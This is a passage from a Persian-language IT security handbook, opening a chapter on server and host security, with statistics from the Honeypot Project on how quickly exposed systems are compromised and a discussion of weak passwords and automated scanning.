‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﺳﺎﻳﺮ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﺑﺎﺷﺪ )ﻓﺎﺯ ﺭﻣﺰ ﻋﺒﻮﺭ(‪ ،‬ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻭ ﺍﺯ ﻛـﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ‬
‫ﻧﺸﺴﺖ ﻛﺎﺭﺑﺮ )ﻓﺎﺯ ﻧﺸﺴﺖ( ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﻭ ﺍﻳﺠﺎﺩ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﻣﻤﻴﺰﻱ ﻫﻢ ﺑﺎﺷﺪ‪.‬‬
‫‪ ۱۹۰‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺍﻳﻦ ﻳﻚ ﻣﺴﺌﻠﻪ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻔﺎﻭﺕ ﺗﺨﺼﻴﺺ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻫﺮ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺩﻭ ﻧﻔﺮ ﻳﺎ ﺑﻴﺸﺘﺮ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺩﻧﺒﺎﻟﻪ "ﺷﺎﻫﺪ ﺑﻮﺩﻥ" ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬
‫‪٣٤٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺼﻮﺭﺕ ﻋـﺎﻡ‪ ،‬ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺳـﺖ ﻛـﻪ ﻣﻴﺰﺑـﺎﻧﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ ﻭ ﺍﻳـﻦ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ‬
‫ﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ‬
‫ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ‪ ١٩١‬ﻭ ﺳﭙﺲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﭘﺴﺘﻲ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺎﻳﻞ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﺍﻳﻤـﻦ‬
‫ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻫﻨﻮﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ ﻛﻪ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺣﺪﺱﺯﺩﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑﺮﺍﺣﺘـﻲ‬
‫ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ١٩٢‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﻫﺰﺍﺭﺍﻥ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻭ ﻧﻴﻤﻪﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﺒﺎﺩﻟﻪ ﻣﻲﻛﻨﻨﺪ؛ ﻓﻨﻮﻥ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻣﻞ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ‪ ،‬ﺻﻔﺤﺎﺕ ﻭﺏ‪ ،‬ﻭ ﮔﻔﺘﮕﻮﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ )‪ ١٩٣(IRC‬ﺩﺭ ﺣﺪ ﻭﺳﻴﻌﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪ ﺍﻣﻨﻴﺘﻲ )ﺩﻳﺪﺑﺎﻧﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،١٩٤‬ﻓﺎﻳﻠﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ( ﻧﻴﺰ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﭘﺮﻭﮊﺓ ﻛﻮﺯﺓ ﻋﺴﻞ‪ (http://project.honypot.org/) ١٩٥‬ﻳﻚ ﭘﺮﻭﮊﺓ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺯﺍﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ‬
‫ﻼ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑﺮﺭﺳﻲ ﺳﺮﻋﺖ ﺍﻧﺠﺎﻡ ﺣﻤﻠﻪ ﺑﻪ ﺁﻧﻬﺎ‪ ،‬ﮔﺴﺘﺮﺩﮔﻲ ﺟﺎﻣﻌﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﻧﺘـﺎﻳﺞ ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﺍﺻـ ﹰ‬
‫ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨﺪﻩ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺍﻋﻼﻡ ﺷﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻳﺎﻓﺘﻪﻫﺎﻱ ﺍﻳﻦ ﭘﺮﻭﮊﻩ‪ ،‬ﻳﻚ ﺳﻴـﺴﺘﻢ ‪ Red Hat 6.2‬ﺍﺯ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ ،‬ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﭘﺲ ﺍﺯ ﺗﻨﻬﺎ ‪ ۷۲‬ﺳﺎﻋﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺑﺎ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻧﻔـﻮﺫ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﻣـﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮﻟﻲ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺭﻭﺯ ﺑﺎﺭﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﭘﻮﻳﺶ ﻣﻲﺷﻮﺩ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ‬
‫ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows 98‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ )ﻳﻜﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﺪﺓ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ( ﺩﺭ ﺁﻧﻬـﺎ‬
‫‪Host Security‬‬
‫‪Packet Sniffer Software‬‬
‫‪Internet Relay Chat‬‬
‫‪Password Sniffers‬‬
‫‪Honey Pot‬‬
‫‪191‬‬
‫‪192‬‬
‫‪193‬‬
‫‪194‬‬
‫‪195‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ ﺑﺮﺍﻱ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ‬
‫ﺐ ﻭﺍﺭﺩﻩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﺗـﺼﺎﻻﺕ ﭘﺮﺳـﺮﻋﺖ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬
‫ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺁﺳﻴ ﹺ‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﻋﺮﺽ ﻣﺪﺕﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﭘﻮﻳﺶ ﻛﻨﻨﺪ‪.‬‬
‫‪٣٤٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻻ ﺩﺭ ﻫﻤﺎﻥ ﺭﻭﺯ ﺍﻭﻝ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ‪ .‬ﺩﺭ ﻳـﻚ‬
‫ﻓﻌﺎﻝ ﺍﺳﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﺳﺎﻋﺘﻲ ﻳﻜﺒﺎﺭ ﭘﻮﻳﺶ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻮﺭﺩ‪ ،‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ‪ ۱۵‬ﺩﻗﻴﻘﻪ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ!‬
‫ﺍﻳﻦ ﺧﻴﺎﻟﭙﺮﺩﺍﺯﻱ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﺑﺎ ﺭﻋﺎﻳﺖ ﻓﻬﺮﺳﺘﻲ ﺍﺯ "ﺑﺎﻳﺪﻫﺎ" ﻭ "ﻧﺒﺎﻳﺪﻫﺎ" ﺩﺭ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑـﺎﻥ ﺭﺍ ﺗـﺄﻣﻴﻦ‬
‫ﻛﺮﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﮔﻔﺘﻪ ﺷﻮﺩ ﺩﺭ ﻫﺮﺻﻮﺭﺕ‪ ،‬ﻣﻬﺎﺟﻢ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ‪،‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻢ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻧﻤﺎﻳﻴـﺪ‪ ،‬ﻭ ﺩﺭ‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﻳﻤﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘـﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻲ ﻣﻬﺎﺟﻤﺎﻥ‬
‫ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﺷﺒﻜﻪ ﺧﺪﻣﺎﺗﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺁﻥ ﻣﺴﺪﻭﺩ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺳﺘﺮﺳ ﹺ‬
‫ﻻ ﺍﺯ